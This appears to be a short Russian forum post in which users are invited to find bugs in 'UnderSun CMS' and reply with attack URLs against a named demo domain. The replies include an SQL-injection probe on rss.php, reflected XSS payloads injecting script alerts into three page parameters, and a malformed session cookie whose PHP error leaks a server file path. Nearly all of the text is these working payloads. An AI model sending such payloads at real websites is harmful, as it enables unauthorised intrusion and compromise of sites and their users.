Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..

http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E

http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert() ;%3C/script%3E

http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E

PHPSESSID=@#$%^&*

Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7